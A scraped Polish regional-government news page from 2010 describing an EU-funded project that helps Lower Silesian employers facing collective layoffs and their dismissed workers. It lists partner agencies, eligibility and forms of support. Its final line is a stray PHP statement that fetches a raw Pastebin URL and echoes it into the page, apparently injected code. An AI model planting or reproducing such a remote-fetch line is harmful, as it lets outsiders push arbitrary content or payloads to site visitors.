Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

13.01.2010 Realizacja projektu systemowego „Wsparcie pracodawców przechodzących procesy adaptacyjne i ich pracowników szansą stabilizacji regionalnego rynku pracy”

1 grudnia 2009 r. na Dolnym Śląsku rozpoczęto realizację nowego projektu „szybkiego reagowania” będącego odpowiedzią na problemy związane z negatywnymi skutkami spowolnienia gospodarczego, które dotknęło również nasze województwo.

 

Projekt systemowy - „Wsparcie pracodawców przechodzących procesy adaptacyjne i ich pracowników szansą stabilizacji regionalnego rynku pracy”, realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki (Priorytet VIII: Regionalne kadry gospodarki, Działanie 8.1 Rozwój pracowników i przedsiębiorstw w regionie, Poddziałanie 8.1.2 Wsparcie procesów adaptacyjnych i modernizacyjnych w regionie). Umożliwia on udzielenie wsparcia bez konieczności samodzielnego aplikowania w ramach procedury konkursowej. Projekt jest realizowany przez Wydział Rozwoju Gospodarczego Urzędu Marszałkowskiego Województwa Dolnośląskiego wraz z pięcioma Partnerami:

  1. Dolnośląską Agencją Rozwoju Regionalnego SA w Szczawnie Zdroju
  2. Dolnośląską Agencją Współpracy Gospodarczej sp. z o.o. we Wrocławiu
  3. Karkonoską Agencją Rozwoju Regionalnego SA w Jeleniej Górze
  4. Agencją Rozwoju Regionalnego ARLEG SA w Legnicy
  5. Agencją Rozwoju Regionalnego AGROREG SA w Nowej Rudzie

Projekt będzie realizowany do czerwca 2011 r., a jego wartość  wynosi 9.999.735,94 PLN.

 

Do kogo skierowany jest projekt?

Projekt skierowany jest zarówno do przedsiębiorców, którzy prowadzą działalność gospodarczą na obszarze województwa dolnośląskiego i zgłosili do PUP zamiar przeprowadzenia zwolnień grupowych, jak i do pracowników, których miejsce pracy jest zlokalizowane w województwie dolnośląskim.

Powyższy zapis, stanowiący kryterium dostępu oznacza, że w ramach tego projektu wsparcie mogą uzyskać zarówno przedsiębiorcy, jak i pracownicy.

 

Wsparcie dla pracowników

Do projektu może przystąpić osoba, która została zgłoszona do zwolnienia w ramach zwolnień grupowych lecz nie otrzymała jeszcze wypowiedzenia oraz osoba, która znajduje się w okresie wypowiedzenia. Nie obejmuje on natomiast osób, które przestały świadczyć pracę na rzecz danego przedsiębiorcy (po ustaniu stosunku pracy).

Rekrutacja pracowników zwalnianych grupowo do projektu odbywa się za pośrednictwem przedsiębiorcy, który zgłosił tego rodzaju zwolnienie w PUP. Dzięki współpracy z Powiatowymi Urzędami Pracy, które niezwłocznie przekazują urzędowi marszałkowskiemu informacje o zwolnieniach grupowych, możliwe jest nawiązanie kontaktu z przedsiębiorcą, a następnie ze zwalnianymi pracownikami.

 

Korzyści z przystąpienia do projektu

Celem projektu jest ograniczenie napływu osób bezrobotnych za pomocą kompleksowego wsparcia, którego efektem będzie znalezienie przez osoby zwolnione alternatywnego miejsca zatrudnienia, ewentualnie założenie własnej działalności gospodarczej. Zostaną oni objęci fachową opieką doradców zawodowych i psychologów, którzy ocenią predyspozycje zawodowe oraz doradzą w kwestiach związanych z poszukiwaniem pracy. Eksperci wprowadzą w zagadnienia dotyczące zakładania działalności gospodarczej, przedstawią obowiązujące przepisy regulujące zakładanie i prowadzenie działalności gospodarczej.

W ramach projektu można skorzystać z określonego wsparcia:

  • poradnictwa zawodowego,
  • poradnictwa psychologicznego,
  • szkoleń z zakresu zakładania i prowadzenia działalności gospodarczej,
  • doradztwa indywidualnego związanego z zakładaniem działalności gospodarczej,
  • dotacji na uruchomienie działalności gospodarczej,
  • podstawowego wsparcia pomostowego, które będzie udzielane przez okres 6 miesięcy od rozpoczęcia prowadzenia działalności gospodarczej (w wysokości 1 280 PLN miesięcznie),
  • wydłużonego wsparcia pomostowego, które będzie udzielane przez okres 6 miesięcy od zakończenia podstawowego wsparcia pomostowego (w wysokości 1 280 PLN miesięcznie),
  • doradztwa w zakresie efektywnego wykorzystania dotacji i prowadzenia działalności gospodarczej,
  • szkoleń zawodowych,
  • szkoleń przekwalifikowujących,
  • doradztwa w zakresie wyboru nowego zawodu i poszukiwania zatrudnienia (spotkania indywidualne i grupowe),
  • jednorazowego dodatku relokacyjnego/mobilnościowego,
  • jednorazowego dodatku motywacyjnego.

 

Wsparcie dla pracodawców 

Wsparcie skierowane bezpośrednio do przedsiębiorców obejmuje:

  • szkolenia przekwalifikowujące i usługi doradcze w zakresie wyboru nowego zawodu i zdobycia nowych umiejętności zawodowych – delegowanie pracownika na szkolenie przez przedsiębiorcę (w tym indywidualne plany działań i pomoc w wyborze odpowiedniego zawodu i miejsca zatrudnienia),
  • szkolenia i doradztwo dla przedsiębiorców wspomagające proces zmiany profilu działalności przedsiębiorstwa.

 

Udzielenie powyższego wsparcia przedsiębiorcom możliwe będzie po wejściu w życie Rozporządzenia Ministra Rozwoju Regionalnego w sprawie udzielania ograniczonej kwoty pomocy zgodnej ze wspólnym rynkiem w ramach Programu Operacyjnego Kapitał Ludzki. 

 


<- Wstecz do: Aktualności

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");